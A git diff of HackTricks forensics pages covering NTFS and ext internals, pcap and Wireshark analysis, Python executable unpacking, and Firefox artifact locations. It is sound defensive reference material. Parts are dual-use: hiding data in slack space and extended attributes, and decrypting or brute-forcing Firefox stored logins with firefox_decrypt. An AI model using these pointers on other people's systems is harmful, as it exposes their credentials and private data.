| -| 0x2 | 2 | Value offs | Offset from first inode entry or start of block | -| 0x4 | 4 | Value blocks | Disk block where value stored or zero for this block | -| 0x8 | 4 | Value size | Length of value | -| 0xC | 4 | Hash | Hash for attribs in block or zero if in inode | -| 0x10 | | Name | Attribute name w/o trailing NULL | - -```bash -setfattr -n 'user.secret' -v 'This is a secret' file.txt #Save a secret using extended attributes -getfattr file.txt #Get extended attribute names of a file -getdattr -n 'user.secret' file.txt #Get extended attribute called "user.secret" -``` - -## Filesystem View - -To see the contents of the file system, you can **use the free tool**: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html)\ -Or you can mount it in your linux using `mount` command. - -[https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.](https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:\~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.) - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index a974ce1e1..01871c96c 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -32,8 +32,8 @@ The most common tool used in forensics to extract files from images is [**Autops ## Binwalk -**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.\ -It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.\ +**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk). + **Useful commands**: ```bash diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md deleted file mode 100644 index cca30db58..000000000 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md +++ /dev/null @@ -1,248 +0,0 @@ -# NTFS - -## NTFS - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- -## **NTFS** - -**NTFS** (**New Technology File System**) is a proprietary journaling file system developed by Microsoft. - -The cluster is the smallest unit of size in NTFS and the size of the cluster depends on the size of a partition. - -| Partition size | Sectors per cluster | Cluster size | -| ------------------------ | ------------------- | ------------ | -| 512MB or less | 1 | 512 bytes | -| 513MB-1024MB (1GB) | 2 | 1KB | -| 1025MB-2048MB (2GB) | 4 | 2KB | -| 2049MB-4096MB (4GB) | 8 | 4KB | -| 4097MB-8192MB (8GB) | 16 | 8KB | -| 8193MB-16,384MB (16GB) | 32 | 16KB | -| 16,385MB-32,768MB (32GB) | 64 | 32KB | -| Greater than 32,768MB | 128 | 64KB | - -### **Slack-Space** - -As the **smallest** size unit of NTFS is a **cluster**. Each file will be occupying several complete clusters. Then, it's highly probable that **each file occupies more space than necessary**. These **unused** **spaces** **booked** by a file which is called a **slacking** **space** and people could take advantage of this area to **hide** **information**. - -![](<../../../.gitbook/assets/image (498).png>) - -### **NTFS boot sector** - -When you format an NTFS volume, the format program allocates the first 16 sectors for the Boot metadata file. The first sector is a boot sector with a "bootstrap" code and the following 15 sectors are the boot sector's IPL (Initial Program Loader). To increase file system reliability the very last sector of an NTFS partition contains a spare copy of the boot sector. - -### **Master File Table (MFT)** - -The NTFS file system contains a file called the Master File Table (MFT). There is at least **one entry in the MFT for every file on an NTFS file system** volume, including the MFT itself. All information about a file, including its **size, time and date stamps, permissions, and data content**, is stored either in MFT entries or in space outside the MFT that is described by MFT entries. - -As **files are added** to an NTFS file system volume, more entries are added to the MFT and the **MFT increases in size**. When **files** are **deleted** from an NTFS file system volume, their **MFT entries are marked as free** and may be reused. However, disk space that has been allocated for these entries is not reallocated, and the size of the MFT does not decrease. - -The NTFS file system **reserves space for the MFT to keep the MFT as contiguous as possible** as it grows. The space reserved by the NTFS file system for the MFT in each volume is called the **MFT zone**. Space for files and directories is also allocated from this space, but only after all of the volume space outside of the MFT zone has been allocated. - -Depending on the average file size and other variables, **either the reserved MFT zone or the unreserved space on the disk may be allocated first as the disk fills to capacity**. Volumes with a small number of relatively large files will allocate the unreserved space first, while volumes with a large number of relatively small files allocate the MFT zone first. In either case, fragmentation of the MFT starts to take place when one region or the other becomes fully allocated. If the unreserved space is completely allocated, space for user files and directories will be allocated from the MFT zone. If the MFT zone is completely allocated, space for new MFT entries will be allocated from the unreserved space. - -NTFS file systems also generate a **$MFTMirror**. This is a **copy** of the **first 4 entries** of the MFT: $MFT, $MFT Mirror, $Log, $Volume. - -NTFS reserves the first 16 records of the table for special information: - -| System File | File Name | MFT Record | Purpose of the File | -| --------------------- | --------- | ---------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| Master file table | $Mft | 0 | Contains one base file record for each file and folder on an NTFS volume. If the allocation information for a file or folder is too large to fit within a single record, other file records are allocated as well. | -| Master file table 2 | $MftMirr | 1 | A duplicate image of the first four records of the MFT. This file guarantees access to the MFT in case of a single-sector failure. | -| Log file | $LogFile | 2 | Contains a list of transaction steps used for NTFS recoverability. Log file size depends on the volume size and can be as large as 4 MB. It is used by Windows NT/2000 to restore consistency to NTFS after a system failure. | -| Volume | $Volume | 3 | Contains information about the volume, such as the volume label and the volume version. | -| Attribute definitions | $AttrDef | 4 | A table of attribute names, numbers, and descriptions. | -| Root file name index | $ | 5 | The root folder. | -| Cluster bitmap | $Bitmap | 6 | A representation of the volume showing which clusters are in use. | -| Boot sector | $Boot | 7 | Includes the BPB used to mount the volume and additional bootstrap loader code used if the volume is bootable. | -| Bad cluster file | $BadClus | 8 | Contains bad clusters for the volume. | -| Security file | $Secure | 9 | Contains unique security descriptors for all files within a volume. | -| Upcase table | $Upcase | 10 | Converts lowercase characters to matching Unicode uppercase characters. | -| NTFS extension file | $Extend | 11 | Used for various optional extensions such as quotas, reparse point data, and object identifiers. | -| | | 12-15 | Reserved for future use. | -| Quota management file | $Quota | 24 | Contains user assigned quota limits on the volume space. | -| Object Id file | $ObjId | 25 | Contains file object IDs. | -| Reparse point file | $Reparse | 26 | This file contains information about files and folders on the volume including reparse point data. | - -### Each entry of the MFT looks like the following: - -![](<../../../.gitbook/assets/image (499).png>) - -Note how each entry starts with "FILE". Each entry occupies 1024 bits. So after 1024 bit from the start of an MFT entry, you will find the next one. - -Using the [**Active Disk Editor**](https://www.disk-editor.org/index.html) it's very easy to inspect the entry of a file in the MFT. Just right click on the file and then click "Inspect File Record" - -![](<../../../.gitbook/assets/image (500).png>) - -![](<../../../.gitbook/assets/image (501).png>) - -Checking the **"In use**" flag it's very easy to know if a file was deleted (a value of **0x0 means deleted**). - -![](<../../../.gitbook/assets/image (510).png>) - -It's also possible to recover deleted files using FTKImager: - -![](<../../../.gitbook/assets/image (502).png>) - -### MFT Attributes - -Each MFT entry has several attributes as the following image indicates: - -![](<../../../.gitbook/assets/image (506).png>) - -Each attribute indicates some entry information identified by the type: - -| Type Identifier | Name | Description | -| --------------- | ------------------------ | ----------------------------------------------------------------------------------------------------------------- | -| 16 | $STANDARD\_INFORMATION | General information, such as flags; the last accessed, written, and created times; and the owner and security ID. | -| 32 | $ATTRIBUTE\_LIST | List where other attributes for a file can be found. | -| 48 | $FILE\_NAME | File name, in Unicode, and the last accessed, written, and created times. | -| 64 | $VOLUME\_VERSION | Volume information. Exists only in version 1.2 (Windows NT). | -| 64 | $OBJECT\_ID | A 16-byte unique identifier for the file or directory. Exists only in versions 3.0+ and after (Windows 2000+). | -| 80 | $SECURITY\_ DESCRIPTOR | The access control and security properties of the file. | -| 96 | $VOLUME\_NAME | Volume name. | -| 112 | $VOLUME\_ INFORMATION | File system version and other flags. | -| 128 | $DATA | File contents. | -| 144 | $INDEX\_ROOT | Root node of an index tree. | -| 160 | $INDEX\_ALLOCATION | Nodes of an index tree rooted in $INDEX\_ROOT attribute. | -| 176 | $BITMAP | A bitmap for the $MFT file and for indexes. | -| 192 | $SYMBOLIC\_LINK | Soft link information. Exists only in version 1.2 (Windows NT). | -| 192 | $REPARSE\_POINT | Contains data about a reparse point, which is used as a soft link in version 3.0+ (Windows 2000+). | -| 208 | $EA\_INFORMATION | Used for backward compatibility with OS/2 applications (HPFS). | -| 224 | $EA | Used for backward compatibility with OS/2 applications (HPFS). | -| 256 | $LOGGED\_UTILITY\_STREAM | Contains keys and information about encrypted attributes in version 3.0+ (Windows 2000+). | - -For example the **type 48 (0x30)** identifies the **file name**: - -![](<../../../.gitbook/assets/image (508).png>) - -It is also useful to understand that **these attributes can be resident** (meaning, they exist within a given MFT record) or **nonresident** (meaning, they exist outside a given MFT record, elsewhere on the disk, and are simply referenced within the record). For example, if the attribute **$Data is resident**, this means that the **whole file is saved in the MFT**, if it's nonresident, then the content of the file is in another part of the file system. - -Some interesting attributes: - -* [$STANDARD\_INFORMATION](https://flatcap.org/linux-ntfs/ntfs/attributes/standard\_information.html) (among others): - * Creation date - * Modification date - * Access date - * MFT update date - * DOS File permissions -* [$FILE\_NAME](https://flatcap.org/linux-ntfs/ntfs/attributes/file\_name.html) (among others): - * File name - * Creation date - * Modification date - * Access date - * MFT update date - * Allocated size - * Real size - * [File reference](https://flatcap.org/linux-ntfs/ntfs/concepts/file\_reference.html) to the parent directory. -* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others): - * Contains the file's data or the indication of the sectors where the data resides. In the following example, the attribute data is not resident so the attribute gives information about the sectors where the data resides. - -![](<../../../.gitbook/assets/image (507) (1) (1).png>) - -![](<../../../.gitbook/assets/image (509).png>) - -### NTFS timestamps - -![](<../../../.gitbook/assets/image (512).png>) - -Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv) (select the mft file or the image and press dump all and extract to extract all the objects).\ -This program will extract all the MFT data and present it in CSV format. It can also be used to dump files. - -![](<../../../.gitbook/assets/image (513).png>) - -### $LOGFILE - -The file **`$LOGFILE`** contains **logs** about the **actions** that have been **performed** **to** **files**. It also **saves** the **action** it would need to perform in case of a **redo** and the action needed to **go back** to the **previous** **state**.\ -These logs are useful for the MFT to rebuild the file system in case some kind of error happened. The maximum size of this file is **65536KB**. - -To inspect the `$LOGFILE` you need to extract it and inspect the `$MFT` previously with [**MFT2csv**](https://github.com/jschicht/Mft2Csv).\ -Then run [**LogFileParser**](https://github.com/jschicht/LogFileParser) against this file and select the exported `$LOGFILE` file and the CVS of the inspection of the `$MFT`. You will obtain a CSV file with the logs of the file system activity recorded by the `$LOGFILE` log. - -![](<../../../.gitbook/assets/image (515).png>) - -Filtering by filenames you can see **all the actions performed against a file**: - -![](<../../../.gitbook/assets/image (514).png>) - -### $USNJnrl - -The file `$EXTEND/$USNJnrl/$J` is an alternate data stream of the file `$EXTEND$USNJnrl`. This artifact contains a **registry of changes produced inside the NTFS volume with more detail than `$LOGFILE`**. - -To inspect this file you can use the tool [**UsnJrnl2csv**](https://github.com/jschicht/UsnJrnl2Csv). - -Filtering by the filename it's possible to see **all the actions performed against a file**. Also, you can find the `MFTReference` in the parent folder. Then looking at that `MFTReference` you can find **information from the parent folder.** - -![](<../../../.gitbook/assets/image (516).png>) - -### $I30 - -Every **directory** in the file system contains an **`$I30`** **attribute** that must be maintained whenever there are changes to the directory's contents. When files or folders are removed from the directory, the **`$I30`** index records are re-arranged accordingly. However, **re-arranging of the index records may leave remnants of the deleted file/folder entry within the slack space**. This can be useful in forensics analysis for identifying files that may have existed on the drive. - -You can get the `$I30` file of a directory from the **FTK Imager** and inspect it with the tool [Indx2Csv](https://github.com/jschicht/Indx2Csv). - -![](<../../../.gitbook/assets/image (519).png>) - -With this data, you can find **information about the file changes performed inside the folder** but note that the deletion time of a file isn't saved inside this log. However, you can see that **last modified date** of the **`$I30` file**, and if the **last action performed** over the directory is the **deletion** of a file, the times may be the same. - -### $Bitmap - -The **`$BitMap`** is a special file within the NTFS file system. This file keeps **track of all of the used and unused clusters** on an NTFS volume. When a file takes up space on the NTFS volume the location used is marked out in the `$BitMap`. - -![](<../../../.gitbook/assets/image (523).png>) - -### ADS (Alternate Data Stream) - -Alternate data streams allow files to contain more than one stream of data. Every file has at least one data stream. In Windows, this default data stream is called `:$DATA`.\ -In this [page you can see different ways to create/access/discover alternate data streams](../../../windows-hardening/basic-cmd-for-pentesters.md#alternate-data-streams-cheatsheet-ads-alternate-data-stream) from the console. In the past, this cause a vulnerability in IIS as people were able to access the source code of a page by accessing the `:$DATA` stream like `http://www.alternate-data-streams.com/default.asp::$DATA`. - -Using the tool [**AlternateStreamView**](https://www.nirsoft.net/utils/alternate\_data\_streams.html) you can search and export all the files with some ADS. - -![](<../../../.gitbook/assets/image (518).png>) - -Using the FTK imager and double clicking on a file with ADS you can **access the ADS data**: - -![](<../../../.gitbook/assets/image (517).png>) - -If you find an ADS called **`Zone.Identifier`** (see the above image), this usually contains **information about how the file was downloaded**. There would be a "ZoneId" field with the following info: - -* Zone ID = 0 -> Mycomputer -* Zone ID = 1 -> Intranet -* Zone ID = 2 -> Trusted -* Zone ID = 3 -> Internet -* Zone ID = 4 -> Untrusted - -Moreover, different software may store additional information: - -| Software | Info | -| ------------------------------------------------------------------- | ---------------------------------------------------------------------------- | -| Google Chrome, Opera, Vivaldi, | ZoneId=3, ReferrerUrl, HostUrl | -| Microsoft Edge | ZoneId=3, LastWriterPackageFamilyName=Microsoft.MicrosoftEdge\_8wekyb3d8bbwe | -| Firefox, Tor browser, Outlook2016, Thunderbird, Windows Mail, Skype | ZoneId=3 | -| ΞΌTorrent | ZoneId=3, HostUrl=about:internet | - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 33bd39f76..8500de6fe 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -80,8 +80,6 @@ This tool is also useful to get **other information analysed** from the packets You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\ This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**. -![](<../../../.gitbook/assets/image (567) (1).png>) - ### [BruteShark](https://github.com/odedshimon/BruteShark) * Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) @@ -162,7 +160,7 @@ Check if you can find any fingerprint of a known malware: ## Zeek -> Zeek is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. +> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are. diff --git a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index 19fc1b0de..ca2eda85f 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -42,7 +42,7 @@ For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsides [https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md) -There is a script that works with Python3: https://github.com/josemlwdf/DNScat-Decoder +There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder) ``` python3 dnscat_decoder.py sample.pcap bad_domain diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 96214a201..1b34fb3ca 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -87,7 +87,9 @@ Other interesting filters: If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_. You can add new layers to the main information bar (No., Time, Source, etc.) by pressing the right button and then the edit column. -Practice: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net) +### Free pcap labs + +**Practice with the free challenges of: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)** ## Identifying Domains @@ -123,7 +125,8 @@ Press _Edit_ and add all the data of the server and the private key (_IP, Port, ### Decrypting https traffic with symmetric session keys -It turns out that Firefox and Chrome both support logging the symmetric session key used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto! decrypted TLS traffic. More in: [https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/)\ +Both Firefox and Chrome have the capability to log TLS session keys, which can be used with Wireshark to decrypt TLS traffic. This allows for in-depth analysis of secure communications. More details on how to perform this decryption can be found in a guide at [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/). + To detect this search inside the environment for to variable `SSLKEYLOGFILE` A file of shared keys will look like this: diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index 0101fcbaa..7c180fcf8 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md @@ -102,22 +102,24 @@ Check the previous error documentation. ## Automatic Tool -The tool [https://github.com/countercept/python-exe-unpacker](https://github.com/countercept/python-exe-unpacker) glues together several tools available to the community that **help researchers to unpack and decompile executable** written in python (py2exe and pyinstaller). - -Several YARA rules are available to determine if the executable is written in python (This script also confirms if the executable is created with either py2exe or pyinstaller). +The **[python-exe-unpacker tool](https://github.com/countercept/python-exe-unpacker)** serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool. ### ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist -Currently, with unpy2exe or pyinstxtractor the Python bytecode file we get might not be complete and in turn, it **can’t be recognized by uncompyle6 to get the plain Python source code**. This is caused by a missing Python **bytecode version number**. Therefore we included a prepend option; this will include a Python bytecode version number into it and help to ease the process of decompiling. When we try to use uncompyle6 to decompile the .pyc file it returns an error. However, **once we use the prepend option we can see that the Python source code has been decompiled successfully**. +A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process. -``` +Example of the issue: + +```python +# Error when attempting to decompile without the prepend option test@test: uncompyle6 unpacked/malware_3.exe/archive.py Traceback (most recent call last): - ………………………. +... ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist ``` -``` +```python +# Successful decompilation after using the prepend option test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive [*] On Python 2.7 [+] Magic bytes are already appended. @@ -183,7 +185,7 @@ To start, we’re going to show you how payloads can be compiled in py2exe and P 2. For the payload (in this case, we will name it hello.py), use a script like the one in Figure 1. The option β€œbundle\_files” with the value of 1 will bundle everything including the Python interpreter into one exe. 3. Once the script is ready, we will issue the command β€œpython setup.py py2exe”. This will create the executable, just like in Figure 2. -``` +```python from distutils.core import setup import py2exe, sys, os @@ -197,7 +199,7 @@ setup( ) ``` -``` +```bash C:\Users\test\Desktop\test>python setup.py py2exe running py2exe *** searching for required modules *** diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 2c09fb01a..1c1306567 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -24,67 +24,54 @@ Get Access Today: ## Browsers Artifacts -When we talk about browser artifacts we talk about, navigation history, bookmarks, list of downloaded files, cache data, etc. +Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. -These artifacts are files stored inside specific folders in the operating system. +Here's a summary of the most common browser artifacts: -Each browser stores its files in a different place than other browsers and they all have different names, but they all store (most of the time) the same type of data (artifacts). +- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites. +- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history. +- **Bookmarks**: Sites saved by the user for quick access. +- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user. +- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis. +- **Logins**: Stored login credentials. +- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits. +- **Browser Sessions**: Data related to open browser sessions. +- **Downloads**: Records of files downloaded through the browser. +- **Form Data**: Information entered in web forms, saved for future autofill suggestions. +- **Thumbnails**: Preview images of websites. +- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary. -Let us take a look at the most common artifacts stored by browsers. - -* **Navigation History:** Contains data about the navigation history of the user. Can be used to track down if the user has visited some malicious sites for example -* **Autocomplete Data:** This is the data that the browser suggests based on what you search for the most. Can be used in tandem with the navigation history to get more insight. -* **Bookmarks:** Self Explanatory. -* **Extensions and Add ons:** Self Explanatory. -* **Cache:** When navigating websites, the browser creates all sorts of cache data (images, javascript files…etc) for many reasons. For example to speed the loading time of websites. These cache files can be a great source of data during a forensic investigation. -* **Logins:** Self Explanatory. -* **Favicons:** They are the little icons found in tabs, urls, bookmarks and the such. They can be used as another source to get more information about the website or places the user visited. -* **Browser Sessions:** Self Explanatory. -* **Downloads**: Self Explanatory. -* **Form Data:** Anything typed inside forms is oftentimes stored by the browser, so the next time the user enters something inside of a form the browser can suggest previously entered data. -* **Thumbnails:** Self Explanatory. -* **Custom Dictionary.txt**: Words added to the dictionary by the user. ## Firefox -Firefox create the profiles folder in \~/_**.mozilla/firefox/**_ (Linux), in **/Users/$USER/Library/Application Support/Firefox/Profiles/** (MacOS), _**%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\\**_ (Windows)_**.**_\ -Inside this folder, the file _**profiles.ini**_ should appear with the name(s) of the user profile(s).\ -Each profile has a "**Path**" variable with the name of the folder where its data is going to be stored. The folder should be **present in the same directory where the \_profiles.ini**\_\*\* exist\*\*. If it isn't, then, probably it was deleted. +Firefox organizes user data within profiles, stored in specific locations based on the operating system: -Inside the folder **of each profile** (_\~/.mozilla/firefox/\/_) path you should be able to find the following interesting files: +- **Linux**: `~/.mozilla/firefox/` +- **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/` +- **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\` -* _**places.sqlite**_ : History (moz\_\_places), bookmarks (moz\_bookmarks), and downloads (moz\_\_annos). In Windows the tool [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing\_history\_view.html) can be used to read the history inside _**places.sqlite**_. - * Query to dump history: `select datetime(lastvisitdate/1000000,'unixepoch') as visit_date, url, title, visit_count, visit_type FROM moz_places,moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id;` - * Note that a link type is a number that indicates: - * 1: User followed a link - * 2: User wrote the URL - * 3: User used a favorite - * 4: Loaded from Iframe - * 5: Accessed via HTTP redirect 301 - * 6: Accessed via HTTP redirect 302 - * 7: Downloaded file - * 8: User followed a link inside an Iframe - * Query to dump downloads: `SELECT datetime(lastModified/1000000,'unixepoch') AS down_date, content as File, url as URL FROM moz_places, moz_annos WHERE moz_places.id = moz_annos.place_id;` - * -* _**bookmarkbackups/**_ : Bookmarks backups -* _**formhistory.sqlite**_ : **Web form data** (like emails) -* _**handlers.json**_ : Protocol handlers (like, which app is going to handle _mailto://_ protocol) -* _**persdict.dat**_ : Words added to the dictionary -* _**addons.json**_ and \_**extensions.sqlite** \_ : Installed addons and extensions -* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) can be used in Windows to inspect this file. -* _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**. +A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted. - Information that can be obtained: +Within each profile folder, you can find several important files: + +- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data. + - Use specific SQL queries to extract history and downloads information. +- **bookmarkbackups**: Contains backups of bookmarks. +- **formhistory.sqlite**: Stores web form data. +- **handlers.json**: Manages protocol handlers. +- **persdict.dat**: Custom dictionary words. +- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions. +- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows. +- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). +- **favicons.sqlite**: Stores favicons. +- **prefs.js**: User settings and preferences. +- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite. +- **thumbnails**: Website thumbnails. +- **logins.json**: Encrypted login information. +- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information. + +Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled. - * URL, fetch Count, Filename, Content type, File size, Last modified time, Last fetched time, Server Last Modified, Server Response -* _**favicons.sqlite**_ : Favicons -* _**prefs.js**_ : Settings and Preferences -* _**downloads.sqlite**_ : Old downloads database (now it's inside places.sqlite) -* _**thumbnails/**_ : Thumbnails -* _**logins.json**_ : Encrypted usernames and passwords -* **Browser’s built-in anti-phishing:** `grep 'browser.safebrowsing' ~/Library/Application Support/Firefox/Profiles/*/prefs.js` - * Will return β€œsafebrowsing.malware.enabled” and β€œphishing.enabled” as false if the safe search settings have been disabled -* _**key4.db**_ or _**key3.db**_ : Master key? To try to decrypt the master password, you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\ With the following script and call you can specify a password file to brute force: @@ -106,30 +93,28 @@ done < $passfile ## Google Chrome -Google Chrome creates the profile inside the home of the user _**\~/.config/google-chrome/**_ (Linux), in _**C:\Users\XXX\AppData\Local\Google\Chrome\User Data\\**_ (Windows), or in \_**/Users/$USER/Library/Application Support/Google/Chrome/** \_ (MacOS).\ 